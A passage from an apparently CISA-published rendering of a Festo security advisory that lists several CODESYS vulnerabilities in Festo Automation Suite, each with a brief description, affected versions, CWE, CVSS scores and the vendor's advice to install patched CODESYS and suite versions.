<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37558</a></h3>
<div class="csaf-accordion-content">
<p>After successful authentication as a user in multiple Codesys products in multiple versions, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37559</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37558">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37559</a></h3>
<div class="csaf-accordion-content">
<p>After successful authentication as a user in multiple Codesys products in multiple versions, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37558</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37559">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-3935</a></h3>
<div class="csaf-accordion-content">
<p>A heap buffer overflow vulnerability in Wibu CodeMeter Runtime network service up to version 7.60b allows an unauthenticated, remote attacker to achieve RCE and gain full access of the host system.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-3935">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-49675</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated local attacker may trick a user to open corrupted project files to execute arbitrary code or crash the system due to an out-of-bounds write vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-49675">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-49676</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated local attacker may trick a user to open corrupted project files to crash the system due to use after free vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-49676">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-6357</a></h3>
<div class="csaf-accordion-content">
<p>A low-privileged remote attacker could exploit the vulnerability and inject additional system commands via file system libraries which could give the attacker full control of the device.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-6357">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-5000</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated remote attacker can use a malicious OPC UA client to send a crafted request to affected CODESYS products which can cause a DoS due to incorrect calculation of buffer size.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-5000">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/13.html">CWE-13 ASP.NET Misconfiguration: Password in Configuration File</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-8175</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated remote attacker can causes the CODESYS web server to access invalid memory which results in a DoS.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-8175">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
